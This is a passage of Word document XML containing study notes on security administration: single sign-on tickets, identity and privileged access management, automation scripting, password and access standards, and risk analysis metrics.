      <w:r w:rsidR="00725D42" w:rsidRPr="005B4891">
        <w:t>Ticket granting ticket system (Us</w:t>
      </w:r>
      <w:r w:rsidR="001F3939" w:rsidRPr="005B4891">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00074EDF" w:rsidRPr="005B4891">
        <w:t>d for SSO</w:t>
      </w:r>
      <w:r w:rsidR="001F3939" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> in an </w:t>
      </w:r>
      <w:r w:rsidR="00267967" w:rsidRPr="005B4891">
        <w:t>on-premise</w:t>
      </w:r>
      <w:r w:rsidR="001F3939" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> AD domain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BE60EA" w14:textId="5E2C259D" w:rsidR="006C7876" w:rsidRPr="005B4891" w:rsidRDefault="006C7876" w:rsidP="00E82478">
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidR="00D25889" w:rsidRPr="005B4891">
        <w:t>example,</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> movie </w:t>
      </w:r>
      <w:r w:rsidR="00CE14A4" w:rsidRPr="005B4891">
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="0012491B" w:rsidRPr="005B4891">
        <w:t>eater</w:t>
      </w:r>
      <w:r w:rsidR="00D25889" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> ticker</w:t>
      </w:r>
      <w:r w:rsidR="00D35C81" w:rsidRPr="005B4891">
        <w:t>, so I only need to provide credentials once</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249E3070" w14:textId="7AC2B694" w:rsidR="00D856EF" w:rsidRPr="00A05553" w:rsidRDefault="00026B79" w:rsidP="009B101B">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc198019374"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Identity and Access Management (IAM)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="38B47B41" w14:textId="166755A1" w:rsidR="00026B79" w:rsidRPr="005B4891" w:rsidRDefault="008D6CF4" w:rsidP="00026B79">
      <w:r w:rsidRPr="005B4891">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="154CB591" wp14:editId="093FB110">
            <wp:extent cx="6252103" cy="3886200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="96019363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936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0130" cy="389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6081" w14:textId="148A49D2" w:rsidR="00906A68" w:rsidRDefault="00906A68" w:rsidP="00026B79">
      <w:r>
        <w:t xml:space="preserve">Best practice is to not use shared </w:t>
      </w:r>
      <w:r w:rsidR="00525ED3">
        <w:t>accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394207C9" w14:textId="2D012CC6" w:rsidR="00582A7D" w:rsidRPr="005B4891" w:rsidRDefault="00582A7D" w:rsidP="00026B79">
      <w:r w:rsidRPr="005B4891">
        <w:t>Example of and Identity management solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054972F0" w14:textId="60510045" w:rsidR="008D6CF4" w:rsidRPr="005B4891" w:rsidRDefault="007D3DD7" w:rsidP="00582A7D">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>Active directory domain s</w:t>
      </w:r>
      <w:r w:rsidR="006E21A9" w:rsidRPr="005B4891">
        <w:t>ervices</w:t>
      </w:r>
      <w:r w:rsidR="004D1E86" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> (maybe local?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B20055E" w14:textId="4B119E9C" w:rsidR="00582A7D" w:rsidRPr="005B4891" w:rsidRDefault="00582A7D" w:rsidP="00582A7D">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>Microsoft Entra ID</w:t>
      </w:r>
      <w:r w:rsidR="004D1E86" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> (cloud based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693715F8" w14:textId="77777777" w:rsidR="00B024AA" w:rsidRPr="005B4891" w:rsidRDefault="00B024AA" w:rsidP="00B024AA"/>
    <w:p w14:paraId="6E87E309" w14:textId="3E07BE04" w:rsidR="00B024AA" w:rsidRPr="00A05553" w:rsidRDefault="00606E0B" w:rsidP="009B101B">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc198019375"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privileged Identity Management (</w:t>
      </w:r>
      <w:r w:rsidR="00B024AA" w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PIM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="1CC89403" w14:textId="39173656" w:rsidR="00606E0B" w:rsidRPr="005B4891" w:rsidRDefault="00606E0B" w:rsidP="00606E0B">
      <w:r w:rsidRPr="005B4891">
        <w:t>More access than normal users</w:t>
      </w:r>
      <w:r w:rsidR="00EC7A25" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> (can be non-user entities as well)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CD8F1A" w14:textId="672FF81D" w:rsidR="00351207" w:rsidRPr="005B4891" w:rsidRDefault="006B3B60" w:rsidP="00606E0B">
      <w:r w:rsidRPr="005B4891">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00351207" w:rsidRPr="005B4891">
        <w:t>xample</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> of Privileged users</w:t>
      </w:r>
      <w:r w:rsidR="00351207" w:rsidRPr="005B4891">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74521CCA" w14:textId="082B0CF7" w:rsidR="008F45C6" w:rsidRPr="005B4891" w:rsidRDefault="008F45C6" w:rsidP="00351207">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>System admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33638384" w14:textId="6F142EBE" w:rsidR="00351207" w:rsidRPr="005B4891" w:rsidRDefault="00351207" w:rsidP="00351207">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>Network admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04555A27" w14:textId="6ED4627C" w:rsidR="008F45C6" w:rsidRPr="005B4891" w:rsidRDefault="000E1D43" w:rsidP="00351207">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>Cloud admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324CC567" w14:textId="3D5EAC03" w:rsidR="00351207" w:rsidRPr="005B4891" w:rsidRDefault="000E1D43" w:rsidP="00351207">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>Domain or enterprise admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD72970" w14:textId="2B74B856" w:rsidR="00DB4D18" w:rsidRPr="005B4891" w:rsidRDefault="00F755B7" w:rsidP="00DB4D18">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4891">
        <w:t>Windows admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEF2583" w14:textId="5627DC29" w:rsidR="00DB4D18" w:rsidRPr="005B4891" w:rsidRDefault="00DB4D18" w:rsidP="00DB4D18">
      <w:r w:rsidRPr="005B4891">
        <w:t>PIM response = Removing privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C0B1A6" w14:textId="69D962CD" w:rsidR="006B3B60" w:rsidRPr="005B4891" w:rsidRDefault="006D20D1" w:rsidP="00DB4D18">
      <w:r w:rsidRPr="005B4891">
        <w:t>Best practice: Password</w:t>
      </w:r>
      <w:r w:rsidR="009D3404" w:rsidRPr="005B4891">
        <w:t>/secrets</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> vaulting</w:t>
      </w:r>
      <w:r w:rsidR="00B10135" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> (for centralized management)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6EDE51" w14:textId="77777777" w:rsidR="00B10135" w:rsidRPr="005B4891" w:rsidRDefault="00B10135" w:rsidP="00DB4D18"/>
    <w:p w14:paraId="435BC7C8" w14:textId="4E8798FA" w:rsidR="001B6267" w:rsidRPr="00A05553" w:rsidRDefault="001B6267" w:rsidP="009B101B">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc198019376"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Automation and Scripting uses</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="28635A9A" w14:textId="476AA422" w:rsidR="001B6267" w:rsidRPr="005B4891" w:rsidRDefault="008A28F3" w:rsidP="001B6267">
      <w:r w:rsidRPr="005B4891">
        <w:t>Used for</w:t>
      </w:r>
      <w:r w:rsidR="001B7633" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> provisioning</w:t>
      </w:r>
      <w:r w:rsidR="001B7633" w:rsidRPr="005B4891">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B70666" w:rsidRPr="005B4891">
        <w:t>resource provisioning</w:t>
      </w:r>
      <w:r w:rsidR="00C43603" w:rsidRPr="005B4891">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C81641" w:rsidRPr="005B4891">
        <w:t xml:space="preserve">provides </w:t>
      </w:r>
      <w:r w:rsidR="00282E0D" w:rsidRPr="005B4891">
        <w:t>consistency</w:t>
      </w:r>
      <w:r w:rsidR="00C43603" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> and minimizes risk for policy violation if updated</w:t>
      </w:r>
      <w:r w:rsidR="00377A4D" w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> regularly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01175914" w14:textId="62E0BCF0" w:rsidR="00FE76F0" w:rsidRPr="005B4891" w:rsidRDefault="00FE76F0" w:rsidP="001B6267">
      <w:r w:rsidRPr="005B4891">
        <w:t>Can be attached to DRP’s for example (</w:t>
      </w:r>
      <w:r w:rsidR="008108AA" w:rsidRPr="005B4891">
        <w:t>Disaster Recovery Plans) or BCP (Business Continuity plan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D7BA81" w14:textId="77777777" w:rsidR="00B70666" w:rsidRDefault="00B70666" w:rsidP="001B6267"/>
    <w:p w14:paraId="6C030520" w14:textId="535A2208" w:rsidR="004F4864" w:rsidRDefault="004F4864" w:rsidP="001B6267">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F4864">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>POWERSHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5770EA1D" w14:textId="160B46E3" w:rsidR="00A637A8" w:rsidRDefault="00A637A8" w:rsidP="001B6267">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JAVASCRIPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480BFE02" w14:textId="0E02D09A" w:rsidR="00A637A8" w:rsidRDefault="00A637A8" w:rsidP="001B6267">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PYTHON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2647FE" w14:textId="00217396" w:rsidR="00A637A8" w:rsidRDefault="00A637A8" w:rsidP="001B6267">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PERL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471CB36D" w14:textId="75784BBF" w:rsidR="00A637A8" w:rsidRPr="004F4864" w:rsidRDefault="00A637A8" w:rsidP="001B6267">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RUBY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6CBAE8" w14:textId="5209BE20" w:rsidR="004F4864" w:rsidRDefault="000944B6" w:rsidP="001B6267">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BASH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6D0896" w14:textId="77777777" w:rsidR="003254B4" w:rsidRDefault="003254B4" w:rsidP="001B6267">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5087C58C" w14:textId="49BDCEC3" w:rsidR="003254B4" w:rsidRDefault="003254B4" w:rsidP="001B6267">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Define and store data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7F1973" w14:textId="3DB8C985" w:rsidR="00282E0D" w:rsidRPr="005B4891" w:rsidRDefault="004930B4" w:rsidP="001B6267">
      <w:r w:rsidRPr="00A721C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="001D4DE0" w:rsidRPr="005B4891">
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> Object N</w:t>
      </w:r>
      <w:r w:rsidR="001D4DE0" w:rsidRPr="005B4891">
        <w:t>otation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD53CE0" w14:textId="0A540B52" w:rsidR="00343C3C" w:rsidRDefault="001D4DE0" w:rsidP="001B6267">
      <w:r w:rsidRPr="00A721C3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="00231286" w:rsidRPr="005B4891">
        <w:t>Extensible</w:t>
      </w:r>
      <w:r w:rsidRPr="005B4891">
        <w:t xml:space="preserve"> markup language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E7A42F" w14:textId="77777777" w:rsidR="00343C3C" w:rsidRDefault="00343C3C" w:rsidP="001B6267"/>
    <w:p w14:paraId="3CB8D994" w14:textId="2F085357" w:rsidR="00922BB2" w:rsidRDefault="00922BB2" w:rsidP="001B6267">
      <w:r w:rsidRPr="001B08C9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use cases</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6649F7" w14:textId="756E3E56" w:rsidR="009947F9" w:rsidRDefault="009947F9" w:rsidP="00922BB2">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Can be used with SIEM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651FAF78" w14:textId="7E98DFED" w:rsidR="00E77900" w:rsidRDefault="00E77900" w:rsidP="00922BB2">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Access management (remove or give access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283F6630" w14:textId="77777777" w:rsidR="00563ADA" w:rsidRDefault="00563ADA" w:rsidP="00563ADA"/>
    <w:p w14:paraId="7D5408A0" w14:textId="07ED502C" w:rsidR="00AA0653" w:rsidRDefault="00B54C9D" w:rsidP="001B6267">
      <w:r>
        <w:t>Software Development Life Cycle (</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3ED9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SDLC</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D3ADC3" w14:textId="0920A55D" w:rsidR="00C83C09" w:rsidRDefault="00B54C9D" w:rsidP="001B6267">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78731E46" wp14:editId="59EE78CA">
            <wp:extent cx="2435382" cy="2525848"/>
            <wp:effectExtent l="0" t="0" r="3175" b="8255"/>
            <wp:docPr id="390482347" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde, logo, Fon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82347" name="Bilde 1" descr="Et bilde som inneholder tekst, skjermbilde, logo, Font&#10;&#10;KI-generert innhold kan være feil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0915" cy="254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E1EB" w14:textId="77777777" w:rsidR="009C57D6" w:rsidRDefault="009C57D6" w:rsidP="001B6267"/>
    <w:p w14:paraId="523065CE" w14:textId="664E5474" w:rsidR="00C83C09" w:rsidRPr="00A05553" w:rsidRDefault="00080A8D" w:rsidP="00080A8D">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc198019377"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Standards</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="461D6A3A" w14:textId="7C9A2CEF" w:rsidR="00080A8D" w:rsidRDefault="00080A8D" w:rsidP="00080A8D">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Password complexity requirements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38130360" w14:textId="2D8BDDF0" w:rsidR="00080A8D" w:rsidRDefault="00080A8D" w:rsidP="00080A8D">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Password expirations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E85015C" w14:textId="03B0AF33" w:rsidR="00080A8D" w:rsidRDefault="00080A8D" w:rsidP="00080A8D">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>MFA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEF083C" w14:textId="6A7AEC44" w:rsidR="00080A8D" w:rsidRDefault="00080A8D" w:rsidP="00080A8D">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Storage and encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D624CAB" w14:textId="38C0A983" w:rsidR="00080A8D" w:rsidRDefault="00080A8D" w:rsidP="00080A8D">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Password Sharing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C8C992" w14:textId="4C86B065" w:rsidR="00080A8D" w:rsidRDefault="00080A8D" w:rsidP="00080A8D">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Recovery process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA0A361" w14:textId="6FBE8BD6" w:rsidR="00080A8D" w:rsidRDefault="00080A8D" w:rsidP="00080A8D">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Account lockout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CC82A1" w14:textId="0700AF64" w:rsidR="00080A8D" w:rsidRDefault="00080A8D" w:rsidP="00080A8D">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Temporary passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC0C271" w14:textId="39E894F9" w:rsidR="006556BC" w:rsidRDefault="00080A8D" w:rsidP="006556BC">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Legal complia</w:t>
      </w:r>
      <w:r w:rsidR="00C63B38">
        <w:t>nce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26662B9C" w14:textId="77777777" w:rsidR="006556BC" w:rsidRDefault="006556BC" w:rsidP="006556BC">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="049C2BBF" w14:textId="31FD7691" w:rsidR="006556BC" w:rsidRDefault="006556BC" w:rsidP="006556BC">
      <w:pPr>
        <w:pStyle w:val="Overskrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc198019378"/>
      <w:r>
        <w:t>Other standards</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w14:paraId="7E136855" w14:textId="1A0B7601" w:rsidR="006556BC" w:rsidRDefault="003E0A68" w:rsidP="006556BC">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C6E94E" w14:textId="6E905135" w:rsidR="003E0A68" w:rsidRDefault="00442D62" w:rsidP="006556BC">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Physical Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5567A9B3" w14:textId="15C0C0F5" w:rsidR="00442D62" w:rsidRDefault="009068E1" w:rsidP="006556BC">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3282EF" w14:textId="77777777" w:rsidR="00DA2C45" w:rsidRDefault="00DA2C45" w:rsidP="00DA2C45">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="751354C6" w14:textId="56438B19" w:rsidR="009068E1" w:rsidRDefault="006946EA" w:rsidP="00152B3C">
      <w:pPr>
        <w:pStyle w:val="Overskrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc198019379"/>
      <w:r>
        <w:t>Procedures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="35ECD935" w14:textId="523D0326" w:rsidR="006946EA" w:rsidRDefault="006946EA" w:rsidP="006946EA">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Change management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9ED7B5" w14:textId="70A10483" w:rsidR="006946EA" w:rsidRDefault="006946EA" w:rsidP="006946EA">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Onboarding/Offboarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E897482" w14:textId="44B416B4" w:rsidR="006556BC" w:rsidRPr="006556BC" w:rsidRDefault="006946EA" w:rsidP="006556BC">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Playbooks</w:t>
      </w:r>
      <w:r w:rsidR="00E55998">
        <w:t xml:space="preserve"> // Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E70F8AA" w14:textId="00F276E0" w:rsidR="003C0F27" w:rsidRPr="00A05553" w:rsidRDefault="00396765" w:rsidP="005D3708">
      <w:pPr>
        <w:pStyle w:val="Overskrift1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc198019380"/>
      <w:r w:rsidRPr="00A05553">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Risk Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="7EBDF99B" w14:textId="225035F7" w:rsidR="003C0F27" w:rsidRDefault="003C0F27" w:rsidP="003C0F27">
      <w:r>
        <w:t>Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10745A69" w14:textId="1F0FE2D6" w:rsidR="003C0F27" w:rsidRDefault="003C0F27" w:rsidP="003C0F27">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Single Loss Expecta</w:t>
      </w:r>
      <w:r w:rsidR="00DD2FC8">
        <w:t>ncy (SLE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE8E1FF" w14:textId="71624990" w:rsidR="00DD2FC8" w:rsidRDefault="00DD2FC8" w:rsidP="00DD2FC8">
      <w:pPr>
        <w:pStyle w:val="Listeavsnitt"/>
      </w:pPr>
